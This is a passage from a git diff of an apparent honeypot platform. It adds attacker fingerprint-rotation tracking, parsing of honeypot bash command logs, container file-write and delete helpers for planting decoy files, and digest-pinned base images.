AttackerFingerprintState.port == port,
|
||||||
|
AttackerFingerprintState.probe_type == probe_type,
|
||||||
|
)
|
||||||
|
).first()
|
||||||
|
|
||||||
|
if row is None:
|
||||||
|
session.add(AttackerFingerprintState(
|
||||||
|
uuid=str(_uuid.uuid4()),
|
||||||
|
attacker_uuid=attacker.uuid,
|
||||||
|
port=port,
|
||||||
|
probe_type=probe_type,
|
||||||
|
last_hash=new_hash,
|
||||||
|
last_seen=ts,
|
||||||
|
rotation_count=0,
|
||||||
|
))
|
||||||
|
session.commit()
|
||||||
|
return RotationOutcome(
|
||||||
|
kind="first_sighting",
|
||||||
|
old_hash=None,
|
||||||
|
new_hash=new_hash,
|
||||||
|
rotation_count=0,
|
||||||
|
)
|
||||||
|
|
||||||
|
if row.last_hash == new_hash:
|
||||||
|
row.last_seen = ts
|
||||||
|
session.add(row)
|
||||||
|
session.commit()
|
||||||
|
return RotationOutcome(
|
||||||
|
kind="unchanged",
|
||||||
|
old_hash=row.last_hash,
|
||||||
|
new_hash=new_hash,
|
||||||
|
rotation_count=row.rotation_count,
|
||||||
|
)
|
||||||
|
|
||||||
|
old_hash = row.last_hash
|
||||||
|
row.last_hash = new_hash
|
||||||
|
row.last_seen = ts
|
||||||
|
row.rotation_count += 1
|
||||||
|
session.add(row)
|
||||||
|
|
||||||
|
attacker.rotation_count += 1
|
||||||
|
attacker.last_rotation_at = ts
|
||||||
|
session.add(attacker)
|
||||||
|
|
||||||
|
payload: dict[str, Any] = {
|
||||||
|
"attacker_uuid": attacker.uuid,
|
||||||
|
"attacker_ip": attacker_ip,
|
||||||
|
"port": port,
|
||||||
|
"probe_type": probe_type,
|
||||||
|
"old_hash": old_hash,
|
||||||
|
"new_hash": new_hash,
|
||||||
|
"rotation_count": row.rotation_count,
|
||||||
|
"ts": ts.isoformat(),
|
||||||
|
}
|
||||||
|
|
||||||
|
if publish_fn is not None:
|
||||||
|
publish_fn(_ROTATED_EVENT_TYPE, payload)
|
||||||
|
if syslog_fn is not None:
|
||||||
|
syslog_fn(_ROTATED_EVENT_TYPE, payload)
|
||||||
|
|
||||||
|
session.commit()
|
||||||
|
|
||||||
|
return RotationOutcome(
|
||||||
|
kind="rotated",
|
||||||
|
old_hash=old_hash,
|
||||||
|
new_hash=new_hash,
|
||||||
|
rotation_count=row.rotation_count,
|
||||||
|
)
|
||||||
@@ -32,6 +32,21 @@ _RFC5424_RE = re.compile(
|
|||||||
r"(.+)$", # 5: SD element + optional MSG
|
r"(.+)$", # 5: SD element + optional MSG
|
||||||
)
|
)
|
||||||
|
|
||||||
|
# Honeypot SSH PROMPT_COMMAND lines arrive double-wrapped: the
|
||||||
|
# Docker-stdout collector envelope wraps the inner ``logger
|
||||||
|
# --rfc5424 --msgid command -t bash …`` line. Outer MSGID is NIL,
|
||||||
|
# real MSGID lives in the body. Mirrors the unwrap logic in
|
||||||
|
# ``decnet.collector.worker._INNER_RFC5424_RE`` — the two parsers
|
||||||
|
# read the same on-wire format.
|
||||||
|
_INNER_RFC5424_RE = re.compile(
|
||||||
|
r"^(\d{4}-\d{2}-\d{2}T\S+)\s+" # 1: inner TIMESTAMP
|
||||||
|
r"(\S+)\s+" # 2: inner HOSTNAME
|
||||||
|
r"(\S+)\s+" # 3: inner APP-NAME
|
||||||
|
r"\S+\s+" # PROCID (NIL or PID)
|
||||||
|
r"(\S+)\s+" # 4: inner MSGID
|
||||||
|
r"(.+)$", # 5: inner SD/MSG remainder
|
||||||
|
)
|
||||||
|
|
||||||
# Structured data block: [relay@55555 k="v" ...]
|
# Structured data block: [relay@55555 k="v" ...]
|
||||||
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
|
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
|
||||||
|
|
||||||
@@ -121,6 +136,21 @@ def parse_line(line: str) -> LogEvent | None:
|
|||||||
|
|
||||||
ts_raw, decky, service, event_type, sd_rest = m.groups()
|
ts_raw, decky, service, event_type, sd_rest = m.groups()
|
||||||
|
|
||||||
|
# Unwrap double-wrapped Docker-stdout envelopes around bash
|
||||||
|
# PROMPT_COMMAND lines. See ``_INNER_RFC5424_RE`` and the matching
|
||||||
|
# logic in ``decnet.collector.worker.parse_rfc5424``. Must run
|
||||||
|
# before the decky/service NIL-guard below — the OUTER decky is
|
||||||
|
# the docker host, the inner header carries the real source.
|
||||||
|
if event_type == "-" and sd_rest.startswith("-"):
|
||||||
|
body = sd_rest[1:].lstrip()
|
||||||
|
inner = _INNER_RFC5424_RE.match(body)
|
||||||
|
if inner is not None:
|
||||||
|
_i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
|
||||||
|
decky = i_host
|
||||||
|
service = i_app
|
||||||
|
event_type = i_msgid
|
||||||
|
sd_rest = i_rest
|
||||||
|
|
||||||
if decky == "-" or service == "-":
|
if decky == "-" or service == "-":
|
||||||
return None
|
return None
|
||||||
|
|
||||||
@@ -137,6 +167,19 @@ def parse_line(line: str) -> LogEvent | None:
|
|||||||
msg = tail.group(1).strip() if tail else ""
|
msg = tail.group(1).strip() if tail else ""
|
||||||
attacker_ip = _extract_attacker_ip(fields, msg)
|
attacker_ip = _extract_attacker_ip(fields, msg)
|
||||||
|
|
||||||
|
# Free-form bash PROMPT_COMMAND lines arrive with MSGID=NIL or MSGID=command
|
||||||
|
# and a body like `CMD uid=0 user=root src=… pwd=… cmd=<rest of line>`.
|
||||||
|
# Without this rewrite they're invisible to the behavioral profiler, which
|
||||||
|
# filters on event_type ∈ {command, exec, query, …}. The Dockerfile logger
|
||||||
|
# invocation uses --msgid command, so we must also handle the non-nil case.
|
||||||
|
if event_type in ("-", "command") and msg.startswith("CMD ") and "command" not in fields:
|
||||||
|
event_type = "command"
|
||||||
|
head, sep, cmd_rest = msg[4:].partition("cmd=")
|
||||||
|
for k, v in re.findall(r'(\w+)=(\S+)', head):
|
||||||
|
fields.setdefault(k, v)
|
||||||
|
if sep:
|
||||||
|
fields.setdefault("command", cmd_rest)
|
||||||
|
|
||||||
# Mutator-emitted transitions arrive on the same ingest stream but
|
# Mutator-emitted transitions arrive on the same ingest stream but
|
||||||
# belong in the substrate-state index, not the per-IP attacker one.
|
# belong in the substrate-state index, not the per-IP attacker one.
|
||||||
kind: EventKind = (
|
kind: EventKind = (
|
||||||
|
|||||||
@@ -70,7 +70,7 @@ async def run_reuse_loop(
|
|||||||
wake_tasks.append(asyncio.create_task(
|
wake_tasks.append(asyncio.create_task(
|
||||||
_run_control_listener_signal(bus, "reuse-correlator"),
|
_run_control_listener_signal(bus, "reuse-correlator"),
|
||||||
))
|
))
|
||||||
except Exception as exc: # noqa: BLE001
|
except Exception as exc:
|
||||||
log.warning(
|
log.warning(
|
||||||
"reuse correlator: bus unavailable, running in poll-only mode: %s",
|
"reuse correlator: bus unavailable, running in poll-only mode: %s",
|
||||||
exc,
|
exc,
|
||||||
@@ -86,7 +86,7 @@ async def run_reuse_loop(
|
|||||||
results = await engine.correlate_credential_reuse(
|
results = await engine.correlate_credential_reuse(
|
||||||
repo, min_targets=min_targets,
|
repo, min_targets=min_targets,
|
||||||
)
|
)
|
||||||
except Exception: # noqa: BLE001
|
except Exception:
|
||||||
log.exception("reuse correlator: tick failed")
|
log.exception("reuse correlator: tick failed")
|
||||||
results = []
|
results = []
|
||||||
|
|
||||||
@@ -120,11 +120,11 @@ async def run_reuse_loop(
|
|||||||
t.cancel()
|
t.cancel()
|
||||||
if heartbeat_task is not None:
|
if heartbeat_task is not None:
|
||||||
heartbeat_task.cancel()
|
heartbeat_task.cancel()
|
||||||
for t in (*wake_tasks, heartbeat_task):
|
for task in (*wake_tasks, heartbeat_task):
|
||||||
if t is None:
|
if task is None:
|
||||||
continue
|
continue
|
||||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||||
await t
|
await task
|
||||||
if bus is not None:
|
if bus is not None:
|
||||||
with contextlib.suppress(Exception):
|
with contextlib.suppress(Exception):
|
||||||
await bus.close()
|
await bus.close()
|
||||||
@@ -143,7 +143,7 @@ async def _wake_on(bus: BaseBus, wake: asyncio.Event, pattern: str) -> None:
|
|||||||
wake.set()
|
wake.set()
|
||||||
except asyncio.CancelledError:
|
except asyncio.CancelledError:
|
||||||
raise
|
raise
|
||||||
except Exception as exc: # noqa: BLE001
|
except Exception as exc:
|
||||||
log.warning(
|
log.warning(
|
||||||
"reuse correlator: subscriber for %s died (%s); falling back to poll",
|
"reuse correlator: subscriber for %s died (%s); falling back to poll",
|
||||||
pattern, exc,
|
pattern, exc,
|
||||||
|
|||||||
39
decnet/decky_io/__init__.py
Normal file
39
decnet/decky_io/__init__.py
Normal file
@@ -0,0 +1,39 @@
|
|||||||
|
"""Shared primitives for writing/deleting files inside running deckies.
|
||||||
|
|
||||||
|
The canary planter and the orchestrator SSH driver both need to drop
|
||||||
|
bytes into a decky container's filesystem, then sometimes unlink them.
|
||||||
|
The ARG_MAX-safe ``base64 -d``-via-stdin trick lived in two places
|
||||||
|
before this module existed.
|
||||||
|
|
||||||
|
Public API:
|
||||||
|
|
||||||
|
* :func:`write_file_to_container` — write bytes at a path, set mode,
|
||||||
|
optionally backdate mtime.
|
||||||
|
* :func:`delete_file_from_container` — best-effort ``rm -f``.
|
||||||
|
* :func:`resolve_topology_container` — pick the right docker container
|
||||||
|
for a MazeNET decky based on its services list.
|
||||||
|
* :func:`resolve_decky_container` — async helper that takes
|
||||||
|
``(decky_name, topology_id?)``, hydrates the topology when needed,
|
||||||
|
and returns the docker container name.
|
||||||
|
|
||||||
|
Container resolution conventions are documented in
|
||||||
|
:mod:`decnet.topology.compose`; we mirror them here without taking
|
||||||
|
a runtime dependency on the compose generator.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from .resolve import (
|
||||||
|
resolve_decky_container,
|
||||||
|
resolve_topology_container,
|
||||||
|
)
|
||||||
|
from .write import (
|
||||||
|
delete_file_from_container,
|
||||||
|
write_file_to_container,
|
||||||
|
)
|
||||||
|
|
||||||
|
__all__ = [
|
||||||
|
"delete_file_from_container",
|
||||||
|
"resolve_decky_container",
|
||||||
|
"resolve_topology_container",
|
||||||
|
"write_file_to_container",
|
||||||
|
]
|
||||||
72
decnet/decky_io/resolve.py
Normal file
72
decnet/decky_io/resolve.py
Normal file
@@ -0,0 +1,72 @@
|
|||||||
|
"""Decky-name → docker container name resolution.
|
||||||
|
|
||||||
|
Two scopes:
|
||||||
|
|
||||||
|
* **Fleet**: every fleet decky has a ``ssh`` service container named
|
||||||
|
``<decky_name>-ssh`` (see :mod:`decnet.services.ssh`). We always
|
||||||
|
target it because it carries the most realistic filesystem layout.
|
||||||
|
* **MazeNET (topology)**: same ``<name>-ssh`` convention when the
|
||||||
|
decky exposes the ssh service; otherwise the decky's base container
|
||||||
|
named ``decnet_t_<topology_id8>_<decky_name>`` (matches
|
||||||
|
:func:`decnet.topology.compose._container_name`).
|
||||||
|
|
||||||
|
Keeping resolution centralised here means new ``docker exec`` callers
|
||||||
|
(file drops, future bulk planters, etc.) never need to learn the
|
||||||
|
naming conventions — they just call :func:`resolve_decky_container`.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from typing import Any, Iterable, Optional
|
||||||
|
|
||||||
|
_SSH_CONTAINER_SUFFIX = "-ssh"
|
||||||
|
|
||||||
|
|
||||||
|
def resolve_topology_container(
|
||||||
|
topology_id: str, decky_name: str, services: Iterable[str],
|
||||||
|
) -> str:
|
||||||
|
"""Container name for a MazeNET decky.
|
||||||
|
|
||||||
|
See module docstring for the convention. Pure function — no I/O.
|
||||||
|
"""
|
||||||
|
if "ssh" in set(services):
|
||||||
|
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
||||||
|
return f"decnet_t_{topology_id[:8]}_{decky_name}"
|
||||||
|
|
||||||
|
|
||||||
|
async def resolve_decky_container(
|
||||||
|
repo: Any,
|
||||||
|
decky_name: str,
|
||||||
|
*,
|
||||||
|
topology_id: Optional[str] = None,
|
||||||
|
) -> str:
|
||||||
|
"""Resolve the docker container name for *decky_name*.
|
||||||
|
|
||||||
|
Fleet path (``topology_id is None``): returns ``<decky_name>-ssh``
|
||||||
|
unconditionally. No DB lookup — the caller is responsible for
|
||||||
|
knowing the decky exists; if it doesn't, the subsequent
|
||||||
|
``docker exec`` returns a clear error.
|
||||||
|
|
||||||
|
Topology path: hydrates the topology, looks up the decky's services
|
||||||
|
list, delegates to :func:`resolve_topology_container`.
|
||||||
|
|
||||||
|
Raises:
|
||||||
|
LookupError — when ``topology_id`` is set but the topology or
|
||||||
|
its named decky doesn't exist. Callers translate this into
|
||||||
|
404/422 at the API layer.
|
||||||
|
"""
|
||||||
|
if topology_id is None:
|
||||||
|
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
||||||
|
|
||||||
|
from decnet.topology.persistence import hydrate
|
||||||
|
hydrated = await hydrate(repo, topology_id)
|
||||||
|
if hydrated is None:
|
||||||
|
raise LookupError(f"topology {topology_id!r} not found")
|
||||||
|
for decky in hydrated["deckies"]:
|
||||||
|
cfg = decky.get("decky_config") or {}
|
||||||
|
name = cfg.get("name") or decky.get("name")
|
||||||
|
if name == decky_name:
|
||||||
|
services = decky.get("services") or []
|
||||||
|
return resolve_topology_container(topology_id, decky_name, services)
|
||||||
|
raise LookupError(
|
||||||
|
f"decky {decky_name!r} is not in topology {topology_id!r}"
|
||||||
|
)
|
||||||
124
decnet/decky_io/write.py
Normal file
124
decnet/decky_io/write.py
Normal file
@@ -0,0 +1,124 @@
|
|||||||
|
"""``docker exec``-driven file write/delete inside a decky container.
|
||||||
|
|
||||||
|
The write path streams a base64-encoded payload over stdin to
|
||||||
|
``base64 -d`` inside the container, so binary content of any size up
|
||||||
|
to docker's stream limits is safe — interpolating bytes into argv
|
||||||
|
would trip ARG_MAX (~128 KB on most kernels) for any non-trivial blob.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import asyncio
|
||||||
|
import base64
|
||||||
|
import shlex
|
||||||
|
from datetime import datetime, timezone
|
||||||
|
from typing import Optional
|
||||||
|
|
||||||
|
from decnet.logging import get_logger
|
||||||
|
|
||||||
|
log = get_logger("decky_io.write")
|
||||||
|
|
||||||
|
_DOCKER = "docker"
|
||||||
|
_DEFAULT_TIMEOUT = 8.0
|
||||||
|
|
||||||
|
|
||||||
|
def _dirname(path: str) -> str:
|
||||||
|
idx = path.rfind("/")
|
||||||
|
if idx <= 0:
|
||||||
|
return "/"
|
||||||
|
return path[:idx]
|
||||||
|
|
||||||
|
|
||||||
|
async def _run(
|
||||||
|
argv: list[str],
|
||||||
|
*,
|
||||||
|
stdin_bytes: Optional[bytes] = None,
|
||||||
|
timeout: float = _DEFAULT_TIMEOUT,
|
||||||
|
) -> tuple[int, str, str]:
|
||||||
|
try:
|
||||||
|
proc = await asyncio.create_subprocess_exec(
|
||||||
|
*argv,
|
||||||
|
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
|
||||||
|
stdout=asyncio.subprocess.PIPE,
|
||||||
|
stderr=asyncio.subprocess.PIPE,
|
||||||
|
)
|
||||||
|
except FileNotFoundError as exc:
|
||||||
|
return 127, "", f"argv[0] not found: {exc}"
|
||||||
|
try:
|
||||||
|
stdout, stderr = await asyncio.wait_for(
|
||||||
|
proc.communicate(input=stdin_bytes), timeout=timeout,
|
||||||
|
)
|
||||||
|
except asyncio.TimeoutError:
|
||||||
|
try:
|
||||||
|
proc.kill()
|
||||||
|
except ProcessLookupError:
|
||||||
|
pass
|
||||||
|
return 124, "", "timeout"
|
||||||
|
return (
|
||||||
|
proc.returncode if proc.returncode is not None else -1,
|
||||||
|
stdout.decode("utf-8", "replace"),
|
||||||
|
stderr.decode("utf-8", "replace"),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def write_file_to_container(
|
||||||
|
container: str,
|
||||||
|
path: str,
|
||||||
|
content: bytes,
|
||||||
|
*,
|
||||||
|
mode: int = 0o644,
|
||||||
|
mtime: Optional[datetime] = None,
|
||||||
|
timeout: float = _DEFAULT_TIMEOUT,
|
||||||
|
) -> tuple[bool, Optional[str]]:
|
||||||
|
"""Write *content* to *path* inside *container* via ``docker exec``.
|
||||||
|
|
||||||
|
The directory above *path* is created if missing; *mode* is applied
|
||||||
|
after the write; when *mtime* is provided the file is backdated via
|
||||||
|
``touch -d`` (UTC ISO 8601).
|
||||||
|
|
||||||
|
Returns ``(success, error_or_none)``. ``error`` is the trimmed
|
||||||
|
docker stderr on rc != 0, or a short "rc=<n>" if stderr was empty.
|
||||||
|
"""
|
||||||
|
if not path:
|
||||||
|
return False, "empty path"
|
||||||
|
|
||||||
|
encoded = base64.b64encode(content)
|
||||||
|
parts = [
|
||||||
|
f"mkdir -p {shlex.quote(_dirname(path))}",
|
||||||
|
f"base64 -d > {shlex.quote(path)}",
|
||||||
|
f"chmod {mode:o} {shlex.quote(path)}",
|
||||||
|
]
|
||||||
|
if mtime is not None:
|
||||||
|
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
||||||
|
parts.append(f"touch -d {shlex.quote(ts)} {shlex.quote(path)}")
|
||||||
|
sh_cmd = " && ".join(parts)
|
||||||
|
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
|
||||||
|
rc, _stdout, stderr = await _run(argv, stdin_bytes=encoded, timeout=timeout)
|
||||||
|
success = rc == 0
|
||||||
|
if success:
|
||||||
|
return True, None
|
||||||
|
err = stderr.strip()[:256] or f"rc={rc}"
|
||||||
|
log.warning(
|
||||||
|
"decky_io.write failed container=%s path=%s rc=%d stderr=%r",
|
||||||
|
container, path, rc, stderr[:120],
|
||||||
|
)
|
||||||
|
return False, err
|
||||||
|
|
||||||
|
|
||||||
|
async def delete_file_from_container(
|
||||||
|
container: str,
|
||||||
|
path: str,
|
||||||
|
*,
|
||||||
|
timeout: float = _DEFAULT_TIMEOUT,
|
||||||
|
) -> tuple[bool, Optional[str]]:
|
||||||
|
"""Best-effort ``rm -f`` of *path* inside *container*.
|
||||||
|
|
||||||
|
Returns ``(success, error_or_none)``. ``rm -f`` returns rc=0 even
|
||||||
|
when the file is already gone, so a True result here means "the
|
||||||
|
file is not present after this call", regardless of who unlinked it.
|
||||||
|
"""
|
||||||
|
sh_cmd = f"rm -f {shlex.quote(path)}"
|
||||||
|
argv = [_DOCKER, "exec", container, "sh", "-c", sh_cmd]
|
||||||
|
rc, _stdout, stderr = await _run(argv, timeout=timeout)
|
||||||
|
if rc == 0:
|
||||||
|
return True, None
|
||||||
|
return False, stderr.strip()[:256] or f"rc={rc}"
|
||||||
@@ -18,69 +18,86 @@ class DistroProfile:
|
|||||||
build_base: str # apt-compatible image for service Dockerfiles (FROM ${BASE_IMAGE})
|
build_base: str # apt-compatible image for service Dockerfiles (FROM ${BASE_IMAGE})
|
||||||
|
|
||||||
|
|
||||||
|
# Base images are pinned by digest (sha256) to make `docker pull`
|
||||||
|
# reproducible — a registry-side rebuild of "debian:bookworm-slim"
|
||||||
|
# can't silently swap content under us. The :tag is kept for human
|
||||||
|
# readability; the @sha256 is what Docker actually resolves.
|
||||||
|
# Refresh procedure: `docker pull <tag>` then `docker inspect
|
||||||
|
# --format '{{index .RepoDigests 0}}' <tag>`. Last refreshed 2026-05-03.
|
||||||
|
_DEBIAN_BOOKWORM = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252"
|
||||||
|
_UBUNTU_22_04 = "ubuntu:22.04@sha256:962f6cadeae0ea6284001009daa4cc9a8c37e75d1f5191cf0eb83fe565b63dd7"
|
||||||
|
_UBUNTU_20_04 = "ubuntu:20.04@sha256:8feb4d8ca5354def3d8fce243717141ce31e2c428701f6682bd2fafe15388214"
|
||||||
|
_ROCKY_9 = "rockylinux:9-minimal@sha256:305de618a5681ff75b1d608fd22b10f362867dff2f550a4f1d427d21cd7f42b4"
|
||||||
|
_CENTOS_7 = "centos:7@sha256:be65f488b7764ad3638f236b7b515b3678369a5124c47b8d32916d6487418ea4"
|
||||||
|
_ALPINE_3_19 = "alpine:3.19@sha256:6baf43584bcb78f2e5847d1de515f23499913ac9f12bdf834811a3145eb11ca1"
|
||||||
|
_FEDORA_39 = "fedora:39@sha256:d63d63fe593749a5e8dbc8152427d40bbe0ece53d884e00e5f3b44859efa5077"
|
||||||
|
_KALI_ROLLING = "kalilinux/kali-rolling@sha256:1fd0364490011f245688c6ed9fee498a11cd779badfbb0b1d3a721d0f49f2d15"
|
||||||
|
_ARCH_LATEST = "archlinux:latest@sha256:5ba8bb318666baef4d33afefc0e65db80f38b23503cb8e7b150d315cc2d4d5da"
|
||||||
|
|
||||||
|
|
||||||
DISTROS: dict[str, DistroProfile] = {
|
DISTROS: dict[str, DistroProfile] = {
|
||||||
"debian": DistroProfile(
|
"debian": DistroProfile(
|
||||||
slug="debian",
|
slug="debian",
|
||||||
image="debian:bookworm-slim",
|
image=_DEBIAN_BOOKWORM,
|
||||||
display_name="Debian 12 (Bookworm)",
|
display_name="Debian 12 (Bookworm)",
|
||||||
hostname_style="generic",
|
hostname_style="generic",
|
||||||
build_base="debian:bookworm-slim",
|
build_base=_DEBIAN_BOOKWORM,
|
||||||
),
|
),
|
||||||
"ubuntu22": DistroProfile(
|
"ubuntu22": DistroProfile(
|
||||||
slug="ubuntu22",
|
slug="ubuntu22",
|
||||||
image="ubuntu:22.04",
|
image=_UBUNTU_22_04,
|
||||||
display_name="Ubuntu 22.04 LTS (Jammy)",
|
display_name="Ubuntu 22.04 LTS (Jammy)",
|
||||||
hostname_style="generic",
|
hostname_style="generic",
|
||||||
build_base="ubuntu:22.04",
|
build_base=_UBUNTU_22_04,
|
||||||
),
|
),
|
||||||
"ubuntu20": DistroProfile(
|
"ubuntu20": DistroProfile(
|
||||||
slug="ubuntu20",
|
slug="ubuntu20",
|
||||||
image="ubuntu:20.04",
|
image=_UBUNTU_20_04,
|
||||||
display_name="Ubuntu 20.04 LTS (Focal)",
|
display_name="Ubuntu 20.04 LTS (Focal)",
|
||||||
hostname_style="generic",
|
hostname_style="generic",
|
||||||
build_base="ubuntu:20.04",
|
build_base=_UBUNTU_20_04,
|
||||||
),
|
),
|
||||||
"rocky9": DistroProfile(
|
"rocky9": DistroProfile(
|
||||||
slug="rocky9",
|
slug="rocky9",
|
||||||
image="rockylinux:9-minimal",
|
image=_ROCKY_9,
|
||||||
display_name="Rocky Linux 9",
|
display_name="Rocky Linux 9",
|
||||||
hostname_style="rhel",
|
hostname_style="rhel",
|
||||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||||
),
|
),
|
||||||
"centos7": DistroProfile(
|
"centos7": DistroProfile(
|
||||||
slug="centos7",
|
slug="centos7",
|
||||||
image="centos:7",
|
image=_CENTOS_7,
|
||||||
display_name="CentOS 7",
|
display_name="CentOS 7",
|
||||||
hostname_style="rhel",
|
hostname_style="rhel",
|
||||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||||
),
|
),
|
||||||
"alpine": DistroProfile(
|
"alpine": DistroProfile(
|
||||||
slug="alpine",
|
slug="alpine",
|
||||||
image="alpine:3.19",
|
image=_ALPINE_3_19,
|
||||||
display_name="Alpine Linux 3.19",
|
display_name="Alpine Linux 3.19",
|
||||||
hostname_style="minimal",
|
hostname_style="minimal",
|
||||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||||
),
|
),
|
||||||
"fedora": DistroProfile(
|
"fedora": DistroProfile(
|
||||||
slug="fedora",
|
slug="fedora",
|
||||||
image="fedora:39",
|
image=_FEDORA_39,
|
||||||
display_name="Fedora 39",
|
display_name="Fedora 39",
|
||||||
hostname_style="rhel",
|
hostname_style="rhel",
|
||||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||||
),
|
),
|
||||||
"kali": DistroProfile(
|
"kali": DistroProfile(
|
||||||
slug="kali",
|
slug="kali",
|
||||||
image="kalilinux/kali-rolling",
|
image=_KALI_ROLLING,
|
||||||
display_name="Kali Linux (Rolling)",
|
display_name="Kali Linux (Rolling)",
|
||||||
hostname_style="rolling",
|
hostname_style="rolling",
|
||||||
build_base="kalilinux/kali-rolling", # Debian-based, apt-get compatible
|
build_base=_KALI_ROLLING, # Debian-based, apt-get compatible
|
||||||
),
|
),
|
||||||
"arch": DistroProfile(
|
"arch": DistroProfile(
|
||||||
slug="arch",
|
slug="arch",
|
||||||
image="archlinux:latest",
|
image=_ARCH_LATEST,
|
||||||
display_name="Arch Linux",
|
display_name="Arch Linux",
|
||||||
hostname_style="rolling",
|
hostname_style="rolling",
|
||||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||||
),
|
),
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -3,6 +3,7 @@ Deploy, teardown, and status via Docker SDK + subprocess docker compose.
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
import asyncio
|
import asyncio
|
||||||
|
import json
|
||||||
import shutil
|
import shutil
|
||||||
import subprocess # nosec B404
|
import subprocess # nosec B404
|
||||||
import time
|
import time
|
||||||
@@ -57,6 +58,8 @@ _CANONICAL_AUTH_HELPER_DIR = Path(__file__).parent.parent / "templates" / "_shar
|
|||||||
_AUTH_HELPER_SERVICES = {"ssh", "telnet"}
|
_AUTH_HELPER_SERVICES = {"ssh", "telnet"}
|
||||||
_CANONICAL_NTLMSSP = Path(__file__).parent.parent / "templates" / "_shared" / "ntlmssp.py"
|
_CANONICAL_NTLMSSP = Path(__file__).parent.parent / "templates" / "_shared" / "ntlmssp.py"
|
||||||
_NTLMSSP_SERVICES = {"smb", "rdp"}
|
_NTLMSSP_SERVICES = {"smb", "rdp"}
|
||||||
|
_CANONICAL_CADDY_MODULES_DIR = Path(__file__).parent.parent / "templates" / "_caddy_modules"
|
||||||
|
_CADDY_SERVICES = {"http", "https"}
|
||||||
|
|
||||||
|
|
||||||
def _sync_logging_helper(config: DecnetConfig) -> None:
|
def _sync_logging_helper(config: DecnetConfig) -> None:
|
||||||
@@ -163,6 +166,104 @@ def _sync_sessrec_sources(config: DecnetConfig) -> None:
|
|||||||
shutil.copy2(src, dest)
|
shutil.copy2(src, dest)
|
||||||
|
|
||||||
|
|
||||||
|
def _chown_tree(dest: Path, owner_ref: Path) -> None:
|
||||||
|
"""Recursively set uid/gid of *dest* to match *owner_ref*. No-op if not root."""
|
||||||
|
import os
|
||||||
|
if os.geteuid() != 0:
|
||||||
|
return
|
||||||
|
st = owner_ref.stat()
|
||||||
|
uid, gid = st.st_uid, st.st_gid
|
||||||
|
targets = [dest] + list(dest.rglob("*")) if dest.is_dir() else [dest]
|
||||||
|
for p in targets:
|
||||||
|
try:
|
||||||
|
os.lchown(p, uid, gid)
|
||||||
|
except OSError:
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
||||||
|
def _sync_caddy_modules(config: DecnetConfig) -> None:
|
||||||
|
"""Mirror _caddy_modules/ into http/https build contexts.
|
||||||
|
|
||||||
|
The xcaddy builder stage in each Dockerfile references
|
||||||
|
``_caddy_modules/decnetfp`` relative to its build context (the
|
||||||
|
per-service template dir). Since the canonical source lives one
|
||||||
|
level up at ``templates/_caddy_modules/``, we sync it into each
|
||||||
|
active http/https build context before compose up, mirroring the
|
||||||
|
sessrec / auth-helper patterns.
|
||||||
|
"""
|
||||||
|
from decnet.services.registry import get_service
|
||||||
|
src_dir = _CANONICAL_CADDY_MODULES_DIR
|
||||||
|
if not src_dir.is_dir():
|
||||||
|
return
|
||||||
|
seen: set[Path] = set()
|
||||||
|
for decky in config.deckies:
|
||||||
|
for svc_name in decky.services:
|
||||||
|
if svc_name not in _CADDY_SERVICES:
|
||||||
|
continue
|
||||||
|
svc = get_service(svc_name)
|
||||||
|
if svc is None:
|
||||||
|
continue
|
||||||
|
ctx = svc.dockerfile_context()
|
||||||
|
if ctx is None or ctx in seen:
|
||||||
|
continue
|
||||||
|
seen.add(ctx)
|
||||||
|
dest_dir = ctx / "_caddy_modules"
|
||||||
|
dest_dir.mkdir(exist_ok=True)
|
||||||
|
for child in src_dir.iterdir():
|
||||||
|
dest_child = dest_dir / child.name
|
||||||
|
if child.is_dir():
|
||||||
|
if dest_child.exists():
|
||||||
|
shutil.rmtree(dest_child)
|
||||||
|
shutil.copytree(child, dest_child)
|
||||||
|
_chown_tree(dest_child, src_dir)
|
||||||
|
else:
|
||||||
|
if not dest_child.exists() or dest_child.read_bytes() != child.read_bytes():
|
||||||
|
shutil.copy2(child, dest_child)
|
||||||
|
_chown_tree(dest_child, src_dir)
|
||||||
|
|
||||||
|
|
||||||
|
def _compose_ps(compose_file: Path) -> list[dict[str, object]]:
|
||||||
|
"""Return ``docker compose ps`` rows for *compose_file* as parsed JSON.
|
||||||
|
|
||||||
|
Used for post-deploy verification: ``compose up -d`` returns 0 the
|
||||||
|
moment containers are *started*, but a service that crashes on boot
|
||||||
|
(port collision, bad image, missing dependency) only shows up here.
|
||||||
|
Returns an empty list when compose has nothing to report (and on
|
||||||
|
